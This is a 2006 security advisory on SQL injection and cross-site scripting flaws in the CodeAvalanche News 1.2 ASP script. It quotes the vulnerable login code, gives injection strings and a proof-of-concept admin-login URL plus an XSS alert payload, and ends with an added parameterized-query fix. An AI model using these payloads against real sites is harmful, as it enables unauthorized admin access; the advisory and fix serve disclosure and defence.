CANews.txt

23 May 2006. Reported by Omnipresent. Type: packetstorm. Source: packetstormsecurity.com

CANews Remote Multiple Vulnerability in CodeAvalanche News Version 1.2 - SQL Injection and XSS Attac

`------------------------------------------------------------------  
- CANews Remote Multiple Vulnerability -  
-= http://colander.altervista.org/advisory/CANews.txt =-  
------------------------------------------------------------------  
  
-= CodeAvalanche News Version 1.2 =-  
  
  
  
Omnipresent  
May 18, 2006  
  
  
Vulnerability(s):  
----------------  
SQL Injection  
XSS Attack  
  
  
Product:  
--------  
CodeAvalanche News Version 1.2  
  
Vendor:  
--------  
http://www.truecontent.info/codeavalanche/asp-news-publishing-script.php  
  
  
Description of product:  
-----------------------  
  
CodeAvalanche News is an ASP application that allows webmasters to easily add a news page to their website.  
  
Resource Specification  
Platform(s): windows  
Date Added: Mar 8, 2005  
Last Updated: May 5, 2006  
Author: xfairguy  
  
  
Vulnerability / Exploit:  
------------------------  
  
In the [path_of_appl.]\admin directory, the file default.asp contains vulnerable code: the Password variable  
is not properly sanitized, so a malicious user can inject SQL code through it.  
  
Let's look at the source code to understand the problem:  
  
[default.asp]  
  
[...]  
  
  
  
userLogged=false  
If Request("Password")<>"" Then   
'response.Write(Request("Password"))   
'response.flush  
  
dim rsUser,selectSQL  
selectSQL="SELECT * FROM PARAMS where PASSWORD='" & Request("Password") & "'"  
' Example injected value: a' OR 'a' = 'a  
'response.Write(selectSQL)   
  
set rsUser = Server.CreateObject("ADODB.Recordset")  
rsUser.ActiveConnection =connStr  
rsUser.Source = selectSQL  
rsUser.CursorType = 3  
rsUser.CursorLocation = 2  
rsUser.LockType = 3  
rsUser.Open()  
  
  
  
  
[...]  
  
[End default.asp]  
  
As you can see, the problem is in the selectSQL string. The input passed in the Password variable is not properly sanitized, so  
an attacker can inject arbitrary SQL code. Consider this example:  
  
If the Password variable is: 1' OR '1' = '1  
  
the selectSQL string becomes:  
  
selectSQL="SELECT * FROM PARAMS where PASSWORD='1' OR '1' = '1'"  
  
The WHERE clause is then true for every row, and you gain access to the application with admin rights.  
  
  
- XSS Attack Explanation -  
  
There is also an XSS bug in this application.  
If you enter a script in the Headline field of add_news.asp, such as:  
  
<script>alert("XSS Attack")</script>  
  
you will see the alert message "XSS Attack".  
  
  
  
PoC / Proof of Concept of SQL Injection:  
----------------------------------------  
  
An attacker can go to this URL:  
  
http://127.0.0.1/[path_of_application]/CANews/Admin/default.asp?password=1' OR '1' = '1&Submit=Login  
  
  
Vendor Status  
-------------  
  
Not informed!  
  
Credits:  
--------  
omnipresent  
[email protected]  
`
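
A hardened form of the login check quoted from admin/default.asp, plus the output-encoding side of the Headline issue. This is an added example, not code from the advisory or from the vendor. `connStr`, `PARAMS` and `PASSWORD` come from the quoted source; the 255-character limit, the "any matching row means logged in" rule (the original logic is elided) and the `SafeText` helper are assumptions.

```vbscript
<%
' Added example: parameterized rewrite of the login query in admin/default.asp.
' connStr is assumed to be defined earlier in the page, as in the original.
Const adCmdText = 1
Const adVarChar = 200
Const adParamInput = 1
Const MAX_PWD_LEN = 255          ' assumed limit, not taken from the application

Dim userLogged, pwd, cmd, rsUser
userLogged = False

' Read the password from the POST body only, so it cannot arrive in a URL.
pwd = Request.Form("Password")

If Len(pwd) > 0 And Len(pwd) <= MAX_PWD_LEN Then
    Set cmd = Server.CreateObject("ADODB.Command")
    cmd.ActiveConnection = connStr
    cmd.CommandType = adCmdText
    ' The ? placeholder is bound as data: quotes inside pwd stay part of the
    ' compared value and cannot alter the WHERE clause.
    cmd.CommandText = "SELECT * FROM PARAMS WHERE PASSWORD = ?"
    cmd.Parameters.Append cmd.CreateParameter("pwd", adVarChar, adParamInput, MAX_PWD_LEN, pwd)

    Set rsUser = cmd.Execute
    ' Assumption: a matching row means the login succeeded.
    If Not rsUser.EOF Then userLogged = True
    rsUser.Close
    Set rsUser = Nothing
    Set cmd = Nothing
End If

' Output side of the Headline fix: HTML-encode stored text wherever it is
' written into a page, so markup in a headline is displayed, not executed.
' SafeText is a hypothetical helper; appending "" turns Null into "".
Function SafeText(value)
    SafeText = Server.HTMLEncode(value & "")
End Function
%>
```

With this query, the value `1' OR '1' = '1` is compared literally against the stored password and matches no row.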
